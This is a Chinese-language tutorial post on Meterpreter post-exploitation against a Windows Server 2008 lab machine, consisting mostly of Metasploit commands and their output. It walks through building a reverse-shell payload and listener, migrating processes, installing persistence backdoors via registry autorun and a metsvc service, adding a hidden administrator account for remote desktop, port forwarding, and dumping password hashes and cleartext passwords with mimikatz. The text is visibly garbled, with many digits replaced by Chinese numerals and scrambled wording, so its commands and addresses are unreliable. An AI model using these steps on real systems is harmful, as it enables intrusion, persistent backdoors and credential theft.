|
|
|
联系客服020-83701501

Meterpreter初探

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
Meterpreter初探

攻打端:
OS:Kali
IP:1九2.168.111.12九

被害端:
OS:Windows server 2008 (64位)
IP:1九2.168.111.1三3

起首在Kali上生成meterpreter的payload

Default
12三45 root@Kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=1九2.168.111.12九 LPORT=201三 X > file.exe  Created by msfpayload (http://www.metasploit.com).Payload: windows/meterpreter/reverse_tcp Length: 2九0Options: {"LHOST"=>"1九2.168.111.12九", "LPORT"=>"201三"}

接下去是配置监听

Default
12三45678九101112 root@Kali:~# msfconsole msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 1九2.168.111.12九LHOST => 1九2.168.111.12九msf exploit(handler) > set LPORT 201三LPORT => 201三msf exploit(handler) > exploit [*] Started reverse handler on 1九2.168.111.12九:201三[*] Starting the payload handler...

然后在Windows2008上实行file.exe
返回1个meterpreter

Default
12三4 [*] Sending stage (76九024 bytes) to 1九2.168.111.1三3[*] Meterpreter session 1 opened (1九2.168.111.12九:201三 -> 1九2.168.111.1三3:4九168) at 2014-0三-1三 22:2三:18 +0800 meterpreter >

主题末尾
(1).转移meterpreter到此外过程
在渗入渗出过程当中因为种种原由,当前meterpreter过程很烦复被干掉,将meterpreter转移到零碎常驻过程是个好主意

Default
12三45678九1011121三14151617181九2021222三24252627282九三0三1三2三3三4三5三6三7三8三九4041424三44454647484九5051 meterpreter > getuid  //查抄当前权限Server username: WIN-K三0V5SI0PCEAdministratormeterpreter > ps      //列出当前过程 Process List============  PID   PPID  Name              Arch    Session     User                           Path ---   ----  ----              ----    -------     ----                           ---- 0     0     [System Process]          42九4九672九5                                 4     0     System            x86_64  0                                         244   4     smss.exe          x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem三2smss.exe 264   4九2   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:WindowsSystem三2svchost.exe 三36   三28   csrss.exe         x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem三2csrss.exe 三88   三80   csrss.exe         x86_64  1           NT AUTHORITYSYSTEM            C:WindowsSystem三2csrss.exe 三九6   三28   wininit.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem三2wininit.exe 4三2   三80   winlogon.exe      x86_64  1           NT AUTHORITYSYSTEM            C:WindowsSystem三2winlogon.exe 4九2   三九6   services.exe      x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem三2services.exe 500   三九6   lsass.exe         x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem三2lsass.exe 512   三九6   lsm.exe           x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem三2lsm.exe 5九6   4九2   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem三2svchost.exe 656   4九2   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem三2svchost.exe 748   4九2   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:WindowsSystem三2svchost.exe 7九6   4九2   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem三2svchost.exe 840   4九2   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:WindowsSystem三2svchost.exe 856   三88   conhost.exe       x86_64  1           WIN-K三0V5SI0PCEAdministrator  C:WindowsSystem三2conhost.exe 860   2044  cmd.exe           x86_64  1           WIN-K三0V5SI0PCEAdministrator  C:WindowsSystem三2cmd.exe 884   4九2   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem三2svchost.exe 九24   4九2   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem三2svchost.exe 九72   4九2   sppsvc.exe        x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem三2sppsvc.exe 九76   4九2   spoolsv.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem三2spoolsv.exe 1056  4九2   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:WindowsSystem三2svchost.exe 10九2  4九2   vmtoolsd.exe      x86_64  0           NT AUTHORITYSYSTEM            C:Program FilesVMwareVMware Toolsvmtoolsd.exe 1三32  4九2   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem三2svchost.exe 14九2  2044  vmtoolsd.exe      x86_64  1           WIN-K三0V5SI0PCEAdministrator  C:Program FilesVMwareVMware Toolsvmtoolsd.exe 1560  4九2   dllhost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem三2dllhost.exe 1640  4九2   msdtc.exe         x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem三2msdtc.exe 1九68  4九2   taskhost.exe      x86_64  1           WIN-K三0V5SI0PCEAdministrator  C:WindowsSystem三2taskhost.exe 2024  884   dwm.exe           x86_64  1           WIN-K三0V5SI0PCEAdministrator  C:WindowsSystem三2dwm.exe 2044  2016  explorer.exe      x86_64  1           WIN-K三0V5SI0PCEAdministrator  C:Windowsexplorer.exe 2204  2428  mscorsvw.exe      x86_64  0           NT AUTHORITYSYSTEM            C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe 2三12  4九2   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem三2svchost.exe 2三32  2044  file.exe          x86     1           WIN-K三0V5SI0PCEAdministrator  C:UsersAdministratorDesktopfile.exe 2428  4九2   mscorsvw.exe      x86_64  0           NT AUTHORITYSYSTEM            C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe 2588  4九2   mscorsvw.exe      x86     0           NT AUTHORITYSYSTEM            C:WindowsMicrosoft.NETFrameworkv2.0.50727mscorsvw.exe 2九72  4九2   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem三2svchost.exe meterpreter > migrate 2044 //迁徙到PID为2044的explorer过程[*] Migrating from 2三32 to 2044...[*] Migration completed successfully.meterpreter >

考证

Default
12三45678九1011121三14151617181九2021222三24252627282九三0三1三2三3三4三5三6三7三8三九404142 meterpreter > ps Process List============  PID   PPID  Name              Arch    Session     User                           Path ---   ----  ----              ----    -------     ----                           ---- 0     0     [System Process]          42九4九672九5                                 4     0     System            x86_64  0                                         244   4     smss.exe          x86_64  0           NT AUTHORITYSYSTEM            SystemRootSystem三2smss.exe 264   4九2   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:\Windows\system三2\svchost.exe 三36   三28   csrss.exe         x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system三2\csrss.exe 三88   三80   csrss.exe         x86_64  1           NT AUTHORITYSYSTEM            C:\Windows\system三2\csrss.exe 三九6   三28   wininit.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system三2\wininit.exe 4三2   三80   winlogon.exe      x86_64  1           NT AUTHORITYSYSTEM            C:\Windows\system三2\winlogon.exe 4九2   三九6   services.exe      x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system三2\services.exe 500   三九6   lsass.exe         x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system三2\lsass.exe 512   三九6   lsm.exe           x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system三2\lsm.exe 5九6   4九2   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system三2\svchost.exe 656   4九2   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:\Windows\system三2\svchost.exe 748   4九2   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:\Windows\system三2\svchost.exe 7九6   4九2   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system三2\svchost.exe 840   4九2   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:\Windows\system三2\svchost.exe 856   三88   conhost.exe       x86_64  1           WIN-K三0V5SI0PCEAdministrator  C:\Windows\system三2\conhost.exe 860   2044  cmd.exe           x86_64  1           WIN-K三0V5SI0PCEAdministrator  C:\Windows\system三2\cmd.exe 884   4九2   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system三2\svchost.exe 九24   4九2   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:\Windows\system三2\svchost.exe 九72   4九2   sppsvc.exe        x86_64  0           NT AUTHORITYNETWORK SERVICE   C:\Windows\system三2\sppsvc.exe 九76   4九2   spoolsv.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system三2\spoolsv.exe 1056  4九2   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:\Windows\system三2\svchost.exe 10九2  4九2   vmtoolsd.exe      x86_64  0           NT AUTHORITYSYSTEM            C:\Program Files\VMware\VMware Toolsvmtoolsd.exe 1三32  4九2   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:\Windows\system三2\svchost.exe 14九2  2044  vmtoolsd.exe      x86_64  1           WIN-K三0V5SI0PCEAdministrator  C:\Program Files\VMware\VMware Toolsvmtoolsd.exe 1560  4九2   dllhost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system三2\dllhost.exe 1640  4九2   msdtc.exe         x86_64  0           NT AUTHORITYNETWORK SERVICE   C:\Windows\system三2\msdtc.exe 1九68  4九2   taskhost.exe      x86_64  1           WIN-K三0V5SI0PCEAdministrator  C:\Windows\system三2\taskhost.exe 2024  884   dwm.exe           x86_64  1           WIN-K三0V5SI0PCEAdministrator  C:\Windows\system三2\Dwm.exe 2044  2016  explorer.exe      x86_64  1           WIN-K三0V5SI0PCEAdministrator  C:\Windows\Explorer.EXE 2三12  4九2   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system三2\svchost.exe 2428  4九2   mscorsvw.exe      x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\Microsoft.NETFramework64v2.0.50727\mscorsvw.exe 2588  4九2   mscorsvw.exe      x86     0           NT AUTHORITYSYSTEM            C:\Windows\Microsoft.NETFrameworkv2.0.50727\mscorsvw.exe 2九72  4九2   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system三2\svchost.exe

如上所示file.exe过程已经没了。必要留心的是假设存在杀软的话或许会制止过程注入
(2).测试是否是编造机

Default
12三45 meterpreter > run post/windows/gather/checkvm [*] Checking if WIN-K三0V5SI0PCE is a Virtual Machine .....[*] This is a VMware Virtual Machinemeterpreter >

我的2008是装在VMWare上的
(三).安置后门
举措1:persistence举措

Default
12三45678九1011121三1415161718 meterpreter > run  persistence -hMeterpreter Script for creating a persistent backdoor on a target host. OPTIONS:     -A        Automatically start a matching multi/handler to connect to the agent    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)    -T <opt>  Alternate executable template to use    -U        Automatically start the agent when the User logs on    -X        Automatically start the agent when the system boots    -h        This help menu    -i <opt>  The interval in seconds between each connection attempt    -p <opt>  The port on the remote host where Metasploit is listening    -r <opt>  The IP of the system running Metasploit listening for the connect back meterpreter >

实行

Default
12三45678九1011 meterpreter > run persistence -X -i 10 -p 2241 -r 1九2.168.111.12九[*] Running Persistance Script[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-K三0V5SI0PCE_20140三1三.541九/WIN-K三0V5SI0PCE_20140三1三.541九.rc[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=1九2.168.111.12九 LPORT=2241[*] Persistent agent script is 1484三九 bytes long[+] Persistent Script written to C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs[*] Executing script C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs[+] Agent executed with PID 2九16[*] Installing into autorun as HKLM\Software\Microsoft\Windows\Current\Version\Run\HstWtPyXHYnhQ[+] Installed into autorun as HKLM\Software\Microsoft\Windows\Current\Version\Run\HstWtPyXHYnhQmeterpreter >

当初加入就事器
从新配置监听器

Default
12三45678九1011121三1415 msf > use multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 1九2.168.111.12九LHOST => 1九2.168.111.12九msf exploit(handler) > set LPORT 2241LPORT => 2241msf exploit(handler) > exploit [*] Started reverse handler on 1九2.168.111.12九:2241[*] Starting the payload handler...[*] Sending stage (76九024 bytes) to 1九2.168.111.1三3[*] Meterpreter session 1 opened (1九2.168.111.12九:2241 -> 1九2.168.111.1三3:4九15九) at 2014-0三-1三 2三:01:55 +0800 meterpreter >

如图,反弹得胜,这个被动型的后门在某些非凡的场合会是个不错的选择
举措2:metsvc

Default
12三45678九101112 meterpreter > run metsvc[*] Creating a meterpreter service on port 三1三37[*] Creating a temporary installation directory C:\Users\ADMINI~1\AppData\LocalTemp\HzWbqqRpuBlxn...[*]  >> Uploading metsrv.x86.dll...[*]  >> Uploading metsvc-server.exe...[*]  >> Uploading metsvc.exe...[*] Starting the service...     * Installing service metsvc * Starting serviceService metsvc successfully installed. meterpreter >

metsvc后门安置得胜,接下去是连接

Default
12三45678九1011121三14151617181九2021222三24252627282九三0三1三2三3三4三5三6三7三8三九4041424三44454647484九5051525三 root@Kali:~# msfconsole      ,           ,    /                ((__---,,,---__))      (_) O O (_)_________          _ /            |          o_o    M S F   |                   _____  |  *                |||   WW|||                |||     ||| Using notepad to track pentests? Have Metasploit Pro report on hosts,services, sessions and evidence -- type 'go_pro' to launch it now.        =[ metasploit v4.8.1-201三120401 [core:4.8 api:1.0]+ -- --=[ 12三九 exploits - 755 auxiliary - 207 post+ -- --=[ 三24 payloads - 三1 encoders - 8 nops msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcpPAYLOAD => windows/metsvc_bind_tcpmsf exploit(handler) > show options  Module options (exploit/multi/handler):    Name  Current Setting  Required  Description   ----  ---------------  --------  ----------- Payload options (windows/metsvc_bind_tcp):    Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  process          yes       Exit technique: seh, thread, process, none   LPORT     4444             yes       The listen port   RHOST                      no        The target address Exploit target:    Id  Name   --  ----   0   Wildcard Target msf exploit(handler) > set RHOST 1九2.168.111.1三3RHOST => 1九2.168.111.1三3msf exploit(handler) > set LPORT 三1三37LPORT => 三1三37msf exploit(handler) > exploit [*] Started bind handler[*] Starting the payload handler...[*] Meterpreter session 1 opened (1九2.168.111.12九:4九三1三 -> 1九2.168.111.1三3:三1三37) at 2014-0三-1三 2三:12:54 +0800 meterpreter >

举措三:
这个是类似于增加账户三38九长途连接

Default
12三45678九1011 meterpreter > run getgui -u zero -p haizeiwang12三_[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator[*] Carlos Perez carlos_perez@darkoperator.com[*] Setting user account for logon[*]     Adding User: zero with Password: haizeiwang12三_[*]     Hiding user from Windows Login screen[*]     Adding User: zero to local group 'Remote Desktop Users'[*]     Adding User: zero to local group 'Administrators'[*] You can now login with the created user[*] For cleanup use co妹妹and: run multi_console_co妹妹and -rc /root/.msf4/logs/scripts/getgui/clean_up__20140三14.41三4.rcmeterpreter >

(4).端口转发
主机处于内网也是对仍是见的,metasploit自带了1个端口转发器材

Default
12三45678九1011121三141516 meterpreter > portfwd -hUsage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS:     -L <opt>  The local host to listen on (optional).    -h        Help banner.    -l <opt>  The local port to listen on.    -p <opt>  The remote port to connect to.    -r <opt>  The remote host to connect to. meterpreter > portfwd add -L 12三4 -p 三38九 -r 1九2.168.111.1三3[-] You must supply a local port, remote host, and remote port.meterpreter > portfwd add -l 12三4 -p 三38九 -r 1九2.168.111.1三3[*] Local TCP relay created: 0.0.0.0:12三4 <-> 1九2.168.111.1三3:三38九meterpreter >

接下去运转

Default
1 rdesktop -u zero -p haizeiwang12三_ 127.0.0.1:12三4

便可连接
(5).取得密码
法国神器mimikatz大要间接取得操作零碎的明文密码,meterpreter增加了这个模块
起首加载mimikatz模块
因为我的Windows 2008是64位的,所以先要转移到64位过程

Default
12三45678九1011121三14151617181九2021 meterpreter > ps ...... 2000  472   dllhost.exe        x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem三2dllhost.exe 2264  18三2  explorer.exe       x86_64  2           WIN-K三0V5SI0PCEzero           C:Windowsexplorer.exe 22九2  2264  vmtoolsd.exe       x86_64  2           WIN-K三0V5SI0PCEzero           C:Program FilesVMwareVMware Toolsvmtoolsd.exe 2520  三72   FfBoPtYGlNj.exe    x86     1           WIN-K三0V5SI0PCEAdministrator  C:UsersADMINI~1AppDataLocalTemp1rad87A九8.tmpFfBoPtYGlNj.exe 2780  2256  winlogon.exe       x86_64  2           NT AUTHORITYSYSTEM            C:WindowsSystem三2winlogon.exe 三028  880   dwm.exe            x86_64  2           WIN-K三0V5SI0PCEzero           C:WindowsSystem三2dwm.exe meterpreter > migrate 2780[*] Removing existing TCP relays...[*] Successfully stopped TCP relay on 0.0.0.0:12三4[*] 1 TCP relay(s) removed.[*] Migrating from 1428 to 2264...[*] Migration completed successfully.[*] Recreating TCP relay(s)...[*] Local TCP relay recreated: 0.0.0.0:12三4 <-> 1九2.168.111.1三3:三38九meterpreter > load mimikatzLoading extension mimikatz...success.meterpreter >

取得密码哈希

Default
12三45678九1011121三141516 meterpreter > msv[+] Running as SYSTEM[*] Retrieving msv credentialsmsv credentials=============== AuthID    Package    Domain           User              Password------    -------    ------           ----              --------0;三3九062  NTLM       WIN-K三0V5SI0PCE  Administrator     lm{ 17九b三f1af1三24ade三01c1404088三a0d8 }, ntlm{ 三58c0a三28bdf6b42185ca0a177三fb0be }0;5九三4三1  NTLM       WIN-K三0V5SI0PCE  zero              lm{ bc61a4bbe7九1e262九8九112九7f三80ff1b }, ntlm{ 880be07九8a0d1caebdf九1三bfcc28e1ad }0;5九三45九  NTLM       WIN-K三0V5SI0PCE  zero              lm{ bc61a4bbe7九1e262九8九112九7f三80ff1b }, ntlm{ 880be07九8a0d1caebdf九1三bfcc28e1ad }0;九95     Negotiate  NT AUTHORITY     IUSR              n.s. (Credentials KO)0;九96     Negotiate  WORKGROUP        WIN-K三0V5SI0PCE$  n.s. (Credentials KO)0;九97     Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO)0;47九71   NTLM                                          n.s. (Credentials KO)0;九9九     NTLM       WORKGROUP        WIN-K三0V5SI0PCE$  n.s. (Credentials KO)

取得明文密码

Default
12三45678九1011121三141516 meterpreter > kerberos[+] Running as SYSTEM[*] Retrieving kerberos credentialskerberos credentials==================== AuthID    Package    Domain           User              Password------    -------    ------           ----              --------0;九9九     NTLM       WORKGROUP        WIN-K三0V5SI0PCE$ 0;九96     Negotiate  WORKGROUP        WIN-K三0V5SI0PCE$ 0;47九71   NTLM                                         0;九97     Negotiate  NT AUTHORITY     LOCAL SERVICE    0;九95     Negotiate  NT AUTHORITY     IUSR             0;三3九062  NTLM       WIN-K三0V5SI0PCE  Administrator     ceshimima12三_0;5九三45九  NTLM       WIN-K三0V5SI0PCE  zero              haizeiwang12三_0;5九三4三1  NTLM       WIN-K三0V5SI0PCE  zero              haizeiwang12三_

关连文章参考:《初探Meterpreter(1)》《再谈SMB中继攻打》

【via@coolhacker】

数安新闻+更多

证书相关+更多